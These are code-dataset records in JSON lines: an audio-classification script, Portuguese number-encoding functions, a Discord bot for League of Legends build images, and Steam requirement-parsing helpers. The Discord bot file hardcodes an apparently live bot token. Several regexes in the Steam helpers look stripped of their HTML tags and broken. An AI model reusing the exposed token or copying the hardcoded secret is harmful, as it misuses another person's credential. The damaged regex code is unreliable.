np.abs(scipy.fftpack.fft(x)),\n \"fft_phase\": lambda x: np.angle(scipy.fftpack.fft(x)),\n \"dct_phase\": lambda x: np.angle(scipy.fftpack.dct(x)),\n \"cepstrum\": lambda x: np.abs(\n scipy.fftpack.ifft(np.log(np.abs(scipy.fftpack.fft(x)) ** 2 + 1e-4))\n )\n ** 2,\n \"raw\": lambda x: x,\n}\n\n# possible windowing functions\nwindow_fns = {\n \"hamming\": scipy.signal.hamming,\n \"hann\": scipy.signal.hann,\n \"boxcar\": scipy.signal.boxcar,\n \"blackmanharris\": scipy.signal.blackmanharris,\n}\n\n\ndef load_wav(fname):\n sr, wave = scipy.io.wavfile.read(fname)\n return wave / 32768.0\n\n\ndef load_features_window(data, size, step, window_fn, feature_fn, label, feature_range, decimate):\n\n features = window.window_data(data, size=size, step=step)\n labels = np.full(len(features), label)\n print(f\"Loading into {len(features)} windows of length {size}\")\n\n fn = feature_fns[feature_fn]\n start_range = int(feature_range[0] * features.shape[1])\n end_range = int(feature_range[1] * features.shape[1])\n win = window_fns[window_fn](features.shape[1])\n # apply feature transform and window fn\n X = [fn(feature * win)[start_range:end_range:decimate] for feature in features]\n X = np.array(X)\n return X, labels\n\n\ndef load_data(kwargs):\n X = []\n y = []\n for i in range(5):\n fname = f\"data/challenge_train_{i}.wav\"\n wave_data = load_wav(fname)\n features, labels = load_features_window(\n data=wave_data,\n size=kwargs['size'],\n step=kwargs['step'],\n window_fn=kwargs['window_fn'],\n feature_fn=kwargs['feature_fn'],\n label=i,\n feature_range=kwargs[\"feature_range\"],\n decimate=kwargs[\"decimate\"]\n )\n X.append(features)\n y.append(labels)\n\n X = np.concatenate(X, axis=0)\n y = np.concatenate(y, axis=0)\n print(f\"Using {kwargs['feature_fn']} transform and a {kwargs['window_fn']} window.\") \n return X, y\n\nimport sklearn.neighbors\n\n\ndef knn_fit(X, y):\n knn = sklearn.neighbors.KNeighborsClassifier(n_neighbors=7)\n knn.fit(X=X, y=y)\n return knn\n\n\ndef knn_classify(knn, wave_data, kwargs):\n \n features, _ = load_features_window(\n data=wave_data,\n size=kwargs['size'],\n step=kwargs['step'],\n window_fn=kwargs['window_fn'],\n feature_fn=kwargs['feature_fn'], \n feature_range=kwargs[\"feature_range\"],\n decimate=kwargs[\"decimate\"],\n label=-1)\n \n \n print(\"Predicting...\")\n labels = knn.predict(features)\n return labels\n\ndef load_test_wave_labels(basename):\n # load the data from wavfile\n wave = load_wav(basename + \".wav\")\n labels = np.loadtxt(basename + \".labels\")\n return wave, labels\n\n\ndef plot_test(knn, parameters, fname):\n print(\"=\"*80)\n print(f\"Testing with {fname}\")\n wave, labels_true = load_test_wave_labels(fname)\n labels_pred = knn_classify(knn, wave, parameters)\n plot_test_classification(wave, labels_true, labels_pred)\n\ndef run_secret_test(knn, parameters):\n import secret_test\n classify = lambda wave: knn_classify(knn, wave, parameters)\n secret_test.challenge_evaluate_performance(classify)\n\ndef plot_test_classification(wave_data, labels_true, labels_predicted):\n ## plot the classification of wave_data (should be a 1D 8Khz audio wave)\n ## and two sets of labels: true and predicted. They do not need\n ## to be the same length, but they should represent equally-sampled\n ## sections of the wave file\n sr = 4096\n ts = np.arange(len(wave_data)) / float(sr)\n\n try:\n len(labels_true)\n except:\n labels_true = [labels_true]\n\n # make sure there are at least 2 predictions, so interpolation does not freak out\n if len(labels_predicted) == 1:\n labels_predicted = [labels_predicted[0], labels_predicted[0]]\n if len(labels_true) == 1:\n labels_true = [labels_true[0], labels_true[0]]\n\n # predict every 10ms\n frames = ts[::80]\n\n true_inter = scipy.interpolate.interp1d(\n np.linspace(0, np.max(ts), len(labels_true)), labels_true, kind=\"nearest\"\n )\n predicted_inter = scipy.interpolate.interp1d(\n np.linspace(0, np.max(ts), len(labels_predicted)),\n labels_predicted,\n kind=\"nearest\",\n )\n\n true_interpolated = true_inter(frames)[:, None]\n predicted_interpolated = predicted_inter(frames)[:, None]\n # show colorblocks for the labels\n plt.figure(figsize=(16, 4))\n plt.imshow(\n true_interpolated.T,\n extent=[0, np.max(ts), 0, 1],\n interpolation=\"nearest\",\n cmap=\"tab10\",\n vmin=0,\n vmax=10,\n )\n plt.imshow(\n predicted_interpolated.T,\n extent=[0, np.max(ts), 0, -1],\n interpolation=\"nearest\",\n cmap=\"tab10\",\n vmin=0,\n vmax=10,\n )\n\n # plot the wave\n plt.plot(ts, wave_data, c=\"w\", alpha=1)\n plt.text(0.5, 0.5, \"True\", color=\"w\")\n plt.text(0.5, -0.5, \"Predicted\", color=\"w\")\n plt.grid(\"off\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Amplitude\") \n\n print(f\"Prediction accuracy {sklearn.metrics.accuracy_score(true_interpolated, predicted_interpolated):.3f}\")\n print(\"Confusion matrix\")\n print(sklearn.metrics.confusion_matrix(true_interpolated, predicted_interpolated))\n print()","sub_path":"Case_study3/audio_task.py","file_name":"audio_task.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"190360683","text":"def b9876543210(valor): #Ok\n dec = int(valor/10)\n uni = valor%10\n if dec > 0:\n resultado = 10*'0' + 10*dec*'0'\n resultado = list(resultado)\n resultado[(-dec*10)-uni-1] = '1'\n resultado = ''.join(resultado)\n else:\n resultado = 10*'0'\n resultado = list(resultado)\n resultado[-uni-1] = '1'\n resultado = ''.join(resultado)\n\n return resultado\n\ndef bcd8642(valor): #Ok\n uni = valor%10\n uni = bin(uni)\n uni = uni[2:]\n dec = int(valor/10)\n\n if dec > 0:\n resultado = bin(dec) + ' ' + uni\n resultado = resultado[2:]\n else:\n resultado = uni\n\n return resultado\n\ndef aiken(valor):\n pass\n\ndef bcd8642v(valor):\n pass\n\ndef ibm(valor): #Ok\n uni = valor%10\n if uni == 0:\n uni = '1010'\n else:\n uni = bin(uni)\n uni = uni[2:]\n dec = int(valor/10)\n\n if dec > 0:\n resultado = bin(dec) + ' ' + uni\n resultado = resultado[2:]\n else:\n resultado = uni\n\n return resultado\n\ndef excesso3(valor): #Ok\n uni = valor%10\n uni = bin(uni)\n uni = bin(int(uni,2)+3)\n\n dec = int(valor/10)\n if dec > 0:\n dec = bin(dec)\n dec = bin(int(dec,2)+3)\n resultado = dec + ' ' + uni[2:]\n resultado = resultado\n else:\n resultado = uni\n\n return resultado[2:]\n\ndef gray(valor): #ok\n#https://www.youtube.com/watch?v=cF-Q5j7RUEw\n bin_ori = bin(valor)\n bin_ori = bin_ori[2:]\n resultado = []\n resultado.append(bin_ori[0])\n for i in range(len(bin_ori)-1):\n if bin_ori[i] == bin_ori[i+1]:\n resultado.append('0')\n else:\n resultado.append('1')\n resultado = ''.join(resultado)\n\n return resultado\n\n\ndef johnson(valor): #Ok\n if valor == 0: return '0'\n\n resultado = 50*'0'\n resultado = list(resultado)\n\n if valor <= 50:\n for i in range(valor):\n resultado[-i-1] = '1'\n else:\n dif = valor - 50\n for i in range(50):\n resultado[-i-1] = '1'\n for i in range(dif):\n resultado[-i-1] = '0'\n\n resultado = ''.join(resultado)\n\n return resultado\n\n#print(nome_da_funcao(valor))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"373472699","text":"from discord.ext import commands\nfrom riotwatcher import LolWatcher, ApiError\nfrom analyze_good import ChampionData, ChampionBuild\nfrom datadragontest import Canvas\nimport pandas as pd\nfrom discord import role\nimport discord\nimport os\nimport sys, getopt\n\nclient = commands.Bot(command_prefix=\".\", help_command=None)\nkr = pd.read_csv('KR_DATA.csv')\neuw1 = pd.read_csv('EUW1_DATA.csv')\nna1 = pd.read_csv('NA1_DATA.csv')\nresult = [kr, euw1, na1]\ndf = pd.concat(result)\nVERSION = '11.14.1'\n\nwith open('api_key.txt', 'r') as f:\n key = f.readlines()\n data_watcher = LolWatcher(key)\n\n\nclass Consult:\n def __init__(self, champion_id, role=None):\n self.champion_id = champion_id\n self.role = role\n #\n # def analyze(self):\n\n\nchampions = data_watcher.data_dragon.champions(version=VERSION)['data']\n\nchamp_maps = {\n 266: [\"Aatrox\", \"aatrox\", \"AATROX\", 'atrox', 'atroz'],\n 103: [\"Ahri\", \"ahri\", \"AHRI\", 'ari'],\n 84: [\"Akali\", \"akali\", \"AKALI\", 'akali'],\n 12: [\"Alistar\", \"alistar\", \"ALISTAR\", 'alitar'],\n 32: [\"Amumu\", \"amumu\", \"AMUMU\", 'ammumu', 'amumu'],\n 34: [\"Anivia\", \"anivia\", \"ANIVIA\"],\n 1: [\"Annie\", \"annie\", \"ANNIE\", 'anni', 'ani', 'any', 'anny'],\n 523: [\"Aphelios\", \"aphelios\", \"APHELIOS\", 'afelios', 'apelios', 'ap'],\n 22: [\"Ashe\", \"ashe\", \"ASHE\", 'ache', 'a'],\n 136: [\"AurelionSol\", \"aurelionsol\", \"AURELIONSOL\", 'aurelion', 'sol', 'aurelion sol'],\n 268: [\"Azir\", \"azir\", \"AZIR\", 'asir', 'asur'],\n 432: [\"Bard\", \"bard\", \"BARD\", 'bardo', ],\n 53: [\"Blitzcrank\", \"blitzcrank\", \"BLITZCRANK\", 'blitz', 'blizcrank', 'blitzcrank'],\n 63: [\"Brand\", \"brand\", \"BRAND\", 'bran'],\n 201: [\"Braum\", \"braum\", \"BRAUM\"],\n 51: [\"Caitlyn\", \"caitlyn\", \"CAITLYN\", 'cait', 'caitlin'],\n 164: [\"Camille\", \"camille\", \"CAMILLE\", 'camile'],\n 69: [\"Cassiopeia\", \"cassiopeia\", \"CASSIOPEIA\", 'cassio', 'casio', 'cass', 'cassiopeia'],\n 31: [\"Chogath\", \"chogath\", \"CHOGATH\", 'chogat', 'shogat', \"cho'gath\", \"chogat\", \"cho'gat\"],\n 42: [\"Corki\", \"corki\", \"CORKI\", 'korki', 'corki', 'corqui', 'korki', 'koki'],\n 122: [\"Darius\", \"darius\", \"DARIUS\"],\n 131: [\"Diana\", \"diana\", \"DIANA\"],\n 119: [\"Draven\", \"draven\", \"DRAVEN\", 'draiven', 'draven'],\n 36: [\"DrMundo\", \"drmundo\", \"DRMUNDO\", 'dr mundo', 'mundo', 'dr'],\n 245: [\"Ekko\", \"ekko\", \"EKKO\", 'eko', 'ecco', 'eco', 'ecum'],\n 60: [\"Elise\", \"elise\", \"ELISE\", 'elyse', 'elisse'],\n 28: [\"Evelynn\", \"evelynn\", \"EVELYNN\", 'evelin', 'evelinn', 'eve'],\n 81: [\"Ezreal\", \"ezreal\", \"EZREAL\", 'ez'],\n 9: [\"Fiddlesticks\", \"fiddlesticks\", \"FIDDLESTICKS\", 'fiddle', 'fiddlestics', 'fidlestics', 'fidlesticks', 'fidol'],\n 114: [\"Fiora\", \"fiora\", \"FIORA\"],\n 105: [\"Fizz\", \"fizz\", \"FIZZ\", 'fis', 'fiz'],\n 3: [\"Galio\", \"galio\", \"GALIO\", 'nopelien', 'galo'],\n 41: [\"Gangplank\", \"gangplank\", \"GANGPLANK\", 'gp', 'gankplanc', 'gankplanck', 'ganplan'],\n 86: [\"Garen\", \"garen\", \"GAREN\"],\n 150: [\"Gnar\", \"gnar\", \"GNAR\", 'nar', 'gnarr'],\n 79: [\"Gragas\", \"gragas\", \"GRAGAS\"],\n 104: [\"Graves\", \"graves\", \"GRAVES\"],\n 887: [\"Gwen\", \"gwen\", \"GWEN\", 'wen', ':v', 'wuen'],\n 120: [\"Hecarim\", \"hecarim\", \"HECARIM\", 'ecarim', 'eca', 'heca', 'jeca'],\n 74: [\"Heimerdinger\", \"heimerdinger\", \"HEIMERDINGER\", 'heimerdinger', 'heimer', 'heimmer', 'heimmendinger'],\n 420: [\"Illaoi\", \"illaoi\", \"ILLAOI\", 'illa', 'iyaoi'],\n 39: [\"Irelia\", \"irelia\", \"IRELIA\"],\n 427: [\"Ivern\", \"ivern\", \"IVERN\"],\n 40: [\"Janna\", \"janna\", \"JANNA\"],\n 59: [\"JarvanIV\", \"jarvaniv\", \"JARVANIV\", 'jarvan', 'jarvis', 'jarvan cuarto', 'jarban'],\n 24: [\"Jax\", \"jax\", \"JAX\", 'jac'],\n 126: [\"Jayce\", \"jayce\", \"JAYCE\", 'jaise', 'jayse'],\n 202: [\"Jhin\", \"jhin\", \"JHIN\", 'jin'],\n 222: [\"Jinx\", \"jinx\", \"JINX\", 'jix', 'jincs'],\n 145: [\"Kaisa\", \"kaisa\", \"KAISA\", \"kai'sa\", 'kai sa'],\n 429: [\"Kalista\", \"kalista\", \"KALISTA\"],\n 43: [\"Karma\", \"karma\", \"KARMA\"],\n 30: [\"Karthus\", \"karthus\", \"KARTHUS\", 'kartus', 'khartus'],\n 38: [\"Kassadin\", \"kassadin\", \"KASSADIN\", 'kasadin'],\n 55: [\"Katarina\", \"katarina\", \"KATARINA\", 'kata', 'cata'],\n 10: [\"Kayle\", \"kayle\", \"KAYLE\", 'kayle'],\n 141: [\"Kayn\", \"kayn\", \"KAYN\"],\n 85: [\"Kennen\", \"kennen\", \"KENNEN\"],\n 121: [\"Khazix\", \"khazix\", \"KHAZIX\", 'k6', 'ksix', 'six', 'khasics', 'kasix'],\n 203: [\"Kindred\", \"kindred\", \"KINDRED\", 'kindre'],\n 240: [\"Kled\", \"kled\", \"KLED\"],\n 96: [\"KogMaw\", \"kogmaw\", \"KOGMAW\", 'kogmau', 'komau', 'kog mau', 'kog'],\n 7: [\"Leblanc\", \"leblanc\", \"LEBLANC\", 'leblanc', 'leb', 'leb blank'],\n 64: [\"LeeSin\", \"leesin\", \"LEESIN\", 'lisin', 'lee', 'lee sin', 'sin'],\n 89: [\"Leona\", \"leona\", \"LEONA\"],\n 876: [\"Lillia\", \"lillia\", \"LILLIA\"],\n 127: [\"Lissandra\", \"lissandra\", \"LISSANDRA\", 'liss', 'lissandra'],\n 236: [\"Lucian\", \"lucian\", \"LUCIAN\"],\n 117: [\"Lulu\", \"lulu\", \"LULU\"],\n 99: [\"Lux\", \"lux\", \"LUX\"],\n 54: [\"Malphite\", \"malphite\", \"MALPHITE\", 'malpite', 'malfite', 'literalphite'],\n 90: [\"Malzahar\", \"malzahar\", \"MALZAHAR\"],\n 57: [\"Maokai\", \"maokai\", \"MAOKAI\"],\n 11: [\"MasterYi\", \"masteryi\", \"MASTERYI\"],\n 21: [\"MissFortune\", \"missfortune\", \"MISSFORTUNE\", 'miss', 'miss fortune', 'fortune'],\n 62: [\"MonkeyKing\", \"monkeyking\", \"MONKEYKING\", 'wukong', 'wu', 'wukong'],\n 82: [\"Mordekaiser\", \"mordekaiser\", \"MORDEKAISER\", 'mordecaiser'],\n 25: [\"Morgana\", \"morgana\", \"MORGANA\"],\n 267: [\"Nami\", \"nami\", \"NAMI\", 'namy'],\n 75: [\"Nasus\", \"nasus\", \"NASUS\"],\n 111: [\"Nautilus\", \"nautilus\", \"NAUTILUS\", 'nauti'],\n 518: [\"Neeko\", \"neeko\", \"NEEKO\", 'nico', 'niko', 'neeko'],\n 76: [\"Nidalee\", \"nidalee\", \"NIDALEE\", 'nidali'],\n 56: [\"Nocturne\", \"nocturne\", \"NOCTURNE\"],\n 20: [\"Nunu\", \"nunu\", \"NUNU\", 'nunu y willump'],\n 2: [\"Olaf\", \"olaf\", \"OLAF\"],\n 61: [\"Orianna\", \"orianna\", \"ORIANNA\"],\n 516: [\"Ornn\", \"ornn\", \"ORNN\"],\n 80: [\"Pantheon\", \"pantheon\", \"PANTHEON\"],\n 78: [\"Poppy\", \"poppy\", \"POPPY\"],\n 555: [\"Pyke\", \"pyke\", \"PYKE\"],\n 246: [\"Qiyana\", \"qiyana\", \"QIYANA\"],\n 133: [\"Quinn\", \"quinn\", \"QUINN\"],\n 497: [\"Rakan\", \"rakan\", \"RAKAN\"],\n 33: [\"Rammus\", \"rammus\", \"RAMMUS\", 'ramus'],\n 421: [\"RekSai\", \"reksai\", \"REKSAI\", 'rek sai', 'rek', 'sai'],\n 526: [\"Rell\", \"rell\", \"RELL\", 'rel'],\n 58: [\"Renekton\", \"renekton\", \"RENEKTON\", 'renek'],\n 107: [\"Rengar\", \"rengar\", \"RENGAR\"],\n 92: [\"Riven\", \"riven\", \"RIVEN\"],\n 68: [\"Rumble\", \"rumble\", \"RUMBLE\"],\n 13: [\"Ryze\", \"ryze\", \"RYZE\"],\n 360: [\"Samira\", \"samira\", \"SAMIRA\"],\n 113: [\"Sejuani\", \"sejuani\", \"SEJUANI\"],\n 235: [\"Senna\", \"senna\", \"SENNA\"],\n 147: [\"Seraphine\", \"seraphine\", \"SERAPHINE\"],\n 875: [\"Sett\", \"sett\", \"SETT\"],\n 35: [\"Shaco\", \"shaco\", \"SHACO\"],\n 98: [\"Shen\", \"shen\", \"SHEN\"],\n 102: [\"Shyvana\", \"shyvana\", \"SHYVANA\", 'shivana'],\n 27: [\"Singed\", \"singed\", \"SINGED\"],\n 14: [\"Sion\", \"sion\", \"SION\"],\n 15: [\"Sivir\", \"sivir\", \"SIVIR\"],\n 72: [\"Skarner\", \"skarner\", \"SKARNER\"],\n 37: [\"Sona\", \"sona\", \"SONA\"],\n 16: [\"Soraka\", \"soraka\", \"SORAKA\"],\n 50: [\"Swain\", \"swain\", \"SWAIN\"],\n 517: [\"Sylas\", \"sylas\", \"SYLAS\"],\n 134: [\"Syndra\", \"syndra\", \"SYNDRA\"],\n 223: [\"TahmKench\", \"tahmkench\", \"TAHMKENCH\", 'kench', 'kenc', 'quench', 'tham', 'tahm'],\n 163: [\"Taliyah\", \"taliyah\", \"TALIYAH\"],\n 91: [\"Talon\", \"talon\", \"TALON\"],\n 44: [\"Taric\", \"taric\", \"TARIC\"],\n 17: [\"Teemo\", \"teemo\", \"TEEMO\"],\n 412: [\"Thresh\", \"thresh\", \"THRESH\"],\n 18: [\"Tristana\", \"tristana\", \"TRISTANA\"],\n 48: [\"Trundle\", \"trundle\", \"TRUNDLE\"],\n 23: [\"Tryndamere\", \"tryndamere\", \"TRYNDAMERE\"],\n 4: [\"TwistedFate\", \"twistedfate\", \"TWISTEDFATE\"],\n 29: [\"Twitch\", \"twitch\", \"TWITCH\"],\n 77: [\"Udyr\", \"udyr\", \"UDYR\"],\n 6: [\"Urgot\", \"urgot\", \"URGOT\"],\n 110: [\"Varus\", \"varus\", \"VARUS\"],\n 67: [\"Vayne\", \"vayne\", \"VAYNE\"],\n 45: [\"Veigar\", \"veigar\", \"VEIGAR\"],\n 161: [\"Velkoz\", \"velkoz\", \"VELKOZ\", 'vel'],\n 254: [\"Vi\", \"vi\", \"VI\"],\n 234: [\"Viego\", \"viego\", \"VIEGO\"],\n 112: [\"Viktor\", \"viktor\", \"VIKTOR\"],\n 8: [\"Vladimir\", \"vladimir\", \"VLADIMIR\"],\n 106: [\"Volibear\", \"volibear\", \"VOLIBEAR\"],\n 19: [\"Warwick\", \"warwick\", \"WARWICK\"],\n 498: [\"Xayah\", \"xayah\", \"XAYAH\"],\n 101: [\"Xerath\", \"xerath\", \"XERATH\"],\n 5: [\"XinZhao\", \"xinzhao\", \"XINZHAO\"],\n 157: [\"Yasuo\", \"yasuo\", \"YASUO\"],\n 777: [\"Yone\", \"yone\", \"YONE\"],\n 83: [\"Yorick\", \"yorick\", \"YORICK\"],\n 350: [\"Yuumi\", \"yuumi\", \"YUUMI\"],\n 154: [\"Zac\", \"zac\", \"ZAC\"],\n 238: [\"Zed\", \"zed\", \"ZED\"],\n 115: [\"Ziggs\", \"ziggs\", \"ZIGGS\"],\n 26: [\"Zilean\", \"zilean\", \"ZILEAN\"],\n 142: [\"Zoe\", \"zoe\", \"ZOE\"],\n 143: [\"Zyra\", \"zyra\", \"ZYRA\"],\n 'TOP': ['top', 'toplane'],\n 'MIDDLE': ['mid', 'middle'],\n 'JUNGLE': ['jg', 'jungle', 'selva', 'jungla'],\n 'UTILITY': ['sup', 'supp', 'support', 'soporte'],\n 'BOTTOM': ['adc', 'adcarry', 'carry'],\n}\nrole_map = {\n 'TOP': ['top', 'toplane'],\n 'MIDDLE': ['mid', 'middle'],\n 'JUNGLE': ['jg', 'jungle', 'selva', 'jungla'],\n 'UTILITY': ['sup', 'supp', 'support', 'soporte'],\n 'BOTTOM': ['adc', 'adcarry', 'carry'],\n}\n\n\n@client.event\nasync def on_ready():\n print('bot ready')\n\n\nclass Consult:\n def __init__(self, champion, role=None):\n self.champion = champion\n self.role = role\n matches = ChampionData(df)\n champion_matches = matches.champion_data(self.champion, self.role)\n champion = ChampionBuild(champion_matches)\n self.mythic, self.core, self.final, self.starter, self.boots, self.primary_runes, self.secondary_runes, self.spell1, self.spell2, self.champion_name = champion.get_all_data()\n\n def make_all_info(self):\n if self.role is None:\n image = Canvas(self.mythic, self.core, self.final, self.primary_runes, self.secondary_runes, self.champion,\n self.starter, self.boots, self.spell1, self.spell2)\n image.make_image()\n else:\n image = Canvas(self.mythic, self.core, self.final, self.primary_runes, self.secondary_runes, self.champion,\n self.starter, self.boots, self.spell1, self.spell2)\n image.make_image(self.role)\n\n\ndef check_img(champion, rol=None):\n if rol is None:\n file = 'all_info/popular_' + str(champion) + \".png\"\n if os.path.isfile(file):\n return file\n else:\n kayn = Consult(champion)\n kayn.make_all_info()\n return file\n\n else:\n file = 'all_info/popular_' + str(champion) + '_' + rol + \".png\"\n if os.path.isfile(file):\n return file\n else:\n kindred = Consult(champion, rol)\n kindred.make_all_info()\n return file\n\n\n@client.command(aliases=['allinfo', 'AllInfo'])\nasync def ai(ctx, champion, aux=None, aux1=None):\n # this if aux is None, then this is only the champ, with popular role\n champion = champion.lower()\n if aux is None:\n for value in champ_maps.values():\n if champion in value:\n champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n file = check_img(champion, aux)\n await ctx.send(file=discord.File(file))\n break\n print(champion)\n # there are 3 possible options\n # 1. aux is role, then aux1 is None and this means one word champ and its role\n # 2. aux is second word of champ, and aux1 is none, then is a 2 word champs with popular role\n # 3. aux is second word champ and aux1 is its role, thus is a 2 word champ with is specific role\n elif aux is not None and aux1 is None: # this means either opcion 1 or 2\n aux = aux.lower()\n\n for value in champ_maps.values():\n if aux in value:\n aux = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n if aux in role_map.keys():\n # thi means that is option 1\n for value in champ_maps.values():\n if champion in value:\n champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n break\n file = check_img(champion, aux)\n await ctx.send(file=discord.File(file))\n elif type(aux) is int:\n # this means that is option 2\n file = check_img(aux)\n await ctx.send(file=discord.File(file))\n print(champion)\n\n if aux is not None and aux1 is not None:\n # this means option 3, thus we will\n\n print('option3')\n for value in champ_maps.values():\n if champion in value:\n champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n break\n\n for value in champ_maps.values():\n if aux in value:\n aux = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n for value in champ_maps.values():\n if aux1 in value:\n aux1 = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n if type(champion) is int and aux1 in role_map.keys():\n print('make consult with champion and aux1')\n file = check_img(champion, aux1)\n print(file)\n await ctx.send(file=discord.File(file))\n elif type(aux) is int and aux1 in role_map.keys():\n print('make consult with aux and aux1')\n file = check_img(aux, aux1)\n await ctx.send(file=discord.File(file))\n\n\nclient.run('ODQ3NDQ3ODQxMjM2MzIwMjU3.YK-NTg.8tuP_8K9qmRmC9kelmZ-Qiqwg2Y')\n","sub_path":"discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":13528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163166466","text":"import re\n\n\ndef game_genre_category(game_data):\n\t\"\"\"\n\t\tArgs:\n\t\t\tgame_data: Scraped steam game data as dictionary\n\t\tReturn:\n\t\t\tAll game genres and categories.\n\t\"\"\"\n\ttry:\n\t\tgenres = game_data['genres']\n\texcept KeyError:\n\t\tgenres = []\n\n\ttry:\n\t\tcategories = game_data['categories']\n\texcept KeyError:\n\t\tcategories = []\n\n\tgame_themes = genres + categories\n\tif game_themes:\n\t\tget_themes = [theme['description'] for theme in game_themes]\n\t\tjoin_themes = ', '.join(get_themes)\n\t\treturn join_themes\n\treturn ''\n\n\ndef steam_minimum_requirements(raw_requirement):\n\t\"\"\"\n\t\tclean steam game minimum requirements\n\t\"\"\"\n\ttry:\n\t\traw_min = raw_requirement.replace('\\n', '').replace('\\t', '')\n\t\tfind_min = re.findall(\"OS:(.*?)\", raw_min)\n\t\tif not find_min:\n\t\t\tfind_min = re.findall(\"OS(.*?)\", raw_min)\n\t\t\tif not find_min:\n\t\t\t\tfind_min = re.findall(':(.*?)', raw_min + '')\n\t\trequirements = '
  • OS:' + find_min[0] + \"
\"\n\n\t\treturn requirements\n\n\texcept:\n\t\traw_min = raw_requirement.replace('\\n', '').replace('\\t', '')\n\t\tfind_min = re.findall('', raw_min)\n\t\treplace_min = '
    ' + find_min[0].replace(' class=\"bb_ul\">', '') + '
'\n\t\trequirements = replace_min\n\n\t\treturn requirements\n\n\ndef steam_max_requirements(raw_requirement):\n\t\"\"\"\n\t\tclean steam game maximum requirements\n\t\"\"\"\n\ttry:\n\t\traw_max = raw_requirement.replace('\\n', '').replace('\\t', '') + ''\n\t\tfind_max = re.findall(\"OS:(.*?)\", raw_max)\n\t\tif not find_max:\n\t\t\tfind_max = re.findall(\"OS(.*?)\", raw_max)\n\t\t\tif not find_max:\n\t\t\t\tfind_max = re.findall(':
(.*?)', raw_max + '')\n\t\tmax_req = '
  • OS:' + find_max[0] + \"
\"\n\n\t\treturn max_req\n\n\texcept:\n\t\traw_max = raw_requirement.replace('\\n', '').replace('\\t', '') + ''\n\t\tfind_max = re.findall('', raw_max)\n\t\treplace_max = '